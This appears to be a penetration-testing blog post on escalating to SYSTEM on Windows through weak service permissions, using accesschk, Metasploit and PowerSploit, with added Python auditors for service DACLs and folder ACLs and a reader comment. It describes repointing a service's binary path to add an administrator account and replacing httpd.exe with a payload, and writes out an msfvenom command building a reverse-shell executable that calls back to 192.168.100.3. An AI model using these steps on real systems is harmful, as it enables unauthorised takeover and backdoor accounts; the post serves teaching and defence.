It is very common in Windows environments to discover services that run with SYSTEM privileges but do not have appropriate permissions set by the administrator. This means that the user has permissions over the service, over the folder where the service binary is stored, or, even worse, both. These services are found mostly in third-party software and can be used as an escalation point from user to administrator.

Manual

Once a Meterpreter session has been established as a standard user, the first step is to determine whether there are any services over which the user has excessive privileges. This can be done with the accesschk tool from SysInternals.

Uploading Accesschk tool on the target

The command below will list all the services that the user “pentestlab” can modify.

Determination of Permissions over a Service

Service All Access means that the user has full control over this service, and therefore the properties of the service can be modified. The next step is to determine the status of this service, the binary path name and whether the service runs with higher privileges.

Obtaining the Service Configuration
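
The same condition can be audited from the defender's side by reading each service's security descriptor (the SDDL string printed by `sc sdshow`) and flagging allow ACEs that give standard users the rights behind Service All Access, plus the start and stop rights. This is an added example, not code from the original post; the service names, the placeholder SID and both SDDL strings are constructed samples.

```python
import re

# SDDL right codes as they apply to service objects (from `sc sdshow <service>`).
RIGHTS = {"DC": "SERVICE_CHANGE_CONFIG", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
          "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE",
          "RP": "SERVICE_START", "WP": "SERVICE_STOP"}
# The same rights as access-mask bits, for ACEs written in hex (e.g. 0xf01ff).
BITS = {0x2: "DC", 0x40000: "WD", 0x80000: "WO", 0x10000000: "GA",
        0x40000000: "GW", 0x10: "RP", 0x20: "WP"}
# Rights that let the holder change BINARY_PATH_NAME or rewrite the DACL.
TAKEOVER = {"DC", "WD", "WO", "GA", "GW"}
# SDDL aliases of groups that contain standard users.
LOW_PRIV = {"WD": "Everyone", "AU": "Authenticated Users",
            "BU": "BUILTIN\\Users", "IU": "INTERACTIVE"}
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^()]*\))+)")
ACE_RE = re.compile(r"\(([^;]*);[^;]*;([^;]*);[^;]*;[^;]*;([^;)]*)\)")

def granted_codes(rights):
    """Return the audited right codes present in one ACE rights field."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {code for bit, code in BITS.items() if mask & bit}
    return set(re.findall("..", rights)) & set(RIGHTS)

def audit_service_sddl(name, sddl):
    """List allow ACEs that give standard users control over a service."""
    findings = []
    dacl = DACL_RE.search(sddl)
    for ace_type, rights, sid in ACE_RE.findall(dacl.group(1) if dacl else ""):
        # Ordinary local/domain accounts have a RID of 1000 or higher.
        is_user = sid.startswith("S-1-5-21-") and int(sid.rsplit("-", 1)[1]) >= 1000
        granted = granted_codes(rights)
        if ace_type == "A" and (sid in LOW_PRIV or is_user) and granted:
            severity = "HIGH" if granted & TAKEOVER else "REVIEW"
            findings.append((name, LOW_PRIV.get(sid, sid), severity,
                             sorted(RIGHTS[c] for c in granted)))
    return findings

# Constructed samples: a default-style DACL, and one where a standard user
# account (placeholder SID) was granted full control of the service.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
             "S-1-5-21-1111111111-2222222222-3333333333-1001)")

if __name__ == "__main__":
    for svc, sddl in (("ExampleSvc", DEFAULT_SDDL), ("ExampleSvc2", WEAK_SDDL)):
        print(svc, audit_service_sddl(svc, sddl))
```

Deny ACEs and the SACL are ignored, so a HIGH finding means the right is granted by the DACL, not that no deny ACE overrides it.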

Since the Apache service is running as Local System, the BINARY_PATH_NAME parameter can be modified to execute any command on the system. The path of the service binary will be changed so that the “pentestlab” user is added to the local administrators group the next time the service restarts, escalating privileges via this method.

Changing the Service Configuration

Restarting the service will cause the Apache service to fail, as the binary path no longer points to the actual executable of the service.

Restarting the Service

However the command will be executed successfully and the user “pentestlab” will be added to the local administrators group.

Escalation of Privileges via Weak Service Permissions

Metasploit

There is a Metasploit module which can exploit weak service permissions very easily. This module needs to be linked to an existing session.

Metasploit – Service Permission Module

This module will try to identify services where the user has write access to the binary path. If this succeeds, it will write a payload to a temporary folder, reconfigure the binary path of the service to point to the payload instead of the original executable, and finally attempt to restart the service so that the payload is executed as SYSTEM.

Metasploit Privilege Escalation via Service Permission

PowerSploit

Exploitation of weak service permissions can also be done completely through PowerSploit, as it contains modules for service enumeration and service abuse. Depending on the situation and on the privileges available, there are two scenarios for privilege escalation:

  1. Binary Path
  2. Replacing the Service Binary

Binary Path

The Get-ServiceDetail module will list some basic information about the service, such as the process ID and the state.

PowerSploit – Service Details

The module that displays information equivalent to the query service configuration is Get-ModifiableService. This module will list all the services whose binary path the user can modify, and will also determine whether the user can restart the service.

PowerSploit – List Services which the binary path can be modified

The module Invoke-ServiceAbuse will automatically modify the binary path and restart the service in order to add the user john to the local administrators group.

PowerSploit – Abusing the Binary Path

Verifying that the administrator account has been created can be done simply with the net localgroup administrators command.

PowerSploit – Backdoor Administrator Account

Replacing the Service Binary

If the user has permission to write a file into the folder where the service binary is located, then it is possible to simply replace the binary with a custom payload and then restart the service in order to escalate privileges.

The full list of permissions for the services running on the system can be obtained through the module Get-ModifiableServiceFile.

PowerSploit – Obtain Services and File Permissions

From the image above the following conditions exist:

  • Apache Service is running as Local System
  • Standard users have permissions to modify the file where the binary is stored

This means that httpd.exe can be replaced by normal users. PowerSploit can also create a custom binary that will add a user as local administrator.

PowerSploit – Creating the Custom Service

It should be noted that service.exe needs to be renamed to httpd.exe, which is the original binary that the service will execute, and dropped into the binary path. Once the service is restarted, the command will be executed and a new user will be created on the system with local administrator rights.

Custom Service Planted into Binary Path

 

Restart of the Service
PowerSploit – Execution of Service Payload

Alternatively, it is also possible to generate a custom payload through Metasploit and configure a listener in order to get a proper Meterpreter session.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=4444 -f exe -o /root/Desktop/httpd.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes

Saved as: /root/Desktop/httpd.exe
Metasploit – System via Service Binary Replacement

Conclusion

Privilege escalation via weak service permissions can be exploited relatively easily and with various tools and methods. Therefore, evaluating the permissions of the services and folders that exist on the system is necessary to mitigate this threat. In summary:

  • Users should not have permissions to start or stop a service
  • The folder in which the service binary is located should be accessible only to Administrators
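
The second point can be checked by parsing `icacls` output for each service folder and reporting ACEs that let standard users write there. This is an added example, not code from the original post; the folder path and both ACL listings are constructed samples, and the group names assume an English-language Windows installation.

```python
import re

# Groups that contain standard users, as icacls prints them on English systems.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow a file to be replaced or a new one to be planted.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO", "GA", "GW"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
ACE_RE = re.compile(r"^\s*(.+?):((?:\([A-Za-z,]+\))+)\s*$")

def writable_by_users(path, icacls_output):
    """Return (principal, rights) pairs where standard users can write to path."""
    findings = []
    for line in icacls_output.splitlines():
        if line.startswith(path):       # icacls prefixes the first ACE with the path
            line = line[len(path):]
        m = ACE_RE.match(line)
        if not m:
            continue                    # blank line or the "Successfully processed" footer
        principal = m.group(1).strip()
        groups = re.findall(r"\(([^)]+)\)", m.group(2))
        # Deny ACEs and inherit-only ACEs grant nothing on this object itself.
        if principal.lower() not in LOW_PRIV or "DENY" in groups or "IO" in groups:
            continue
        rights = {r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")}
        if rights & WRITE_RIGHTS:
            findings.append((principal, sorted(rights & WRITE_RIGHTS)))
    return findings

# Constructed sample: output of `icacls <dir>` for a hypothetical service folder.
SAMPLE_DIR = r"C:\Program Files\ExampleApp\bin"
WEAK_ACL = r"""C:\Program Files\ExampleApp\bin BUILTIN\Users:(OI)(CI)(M)
                                NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files"""
HARDENED_ACL = r"""C:\Program Files\ExampleApp\bin BUILTIN\Users:(OI)(CI)(RX)
                                NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                BUILTIN\Administrators:(OI)(CI)(F)"""

if __name__ == "__main__":
    print(writable_by_users(SAMPLE_DIR, WEAK_ACL))      # standard users can modify
    print(writable_by_users(SAMPLE_DIR, HARDENED_ACL))  # no findings
```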

 

4 Comments

  1. 1. Please could you help let us know which third party application you used to test this vulnerability?
    2. Also, does the process of privilege escalation for vulnerabilities, e.g. Insecure Registry Permissions, work in combination with Weak Service Permissions or can it work without the same also?
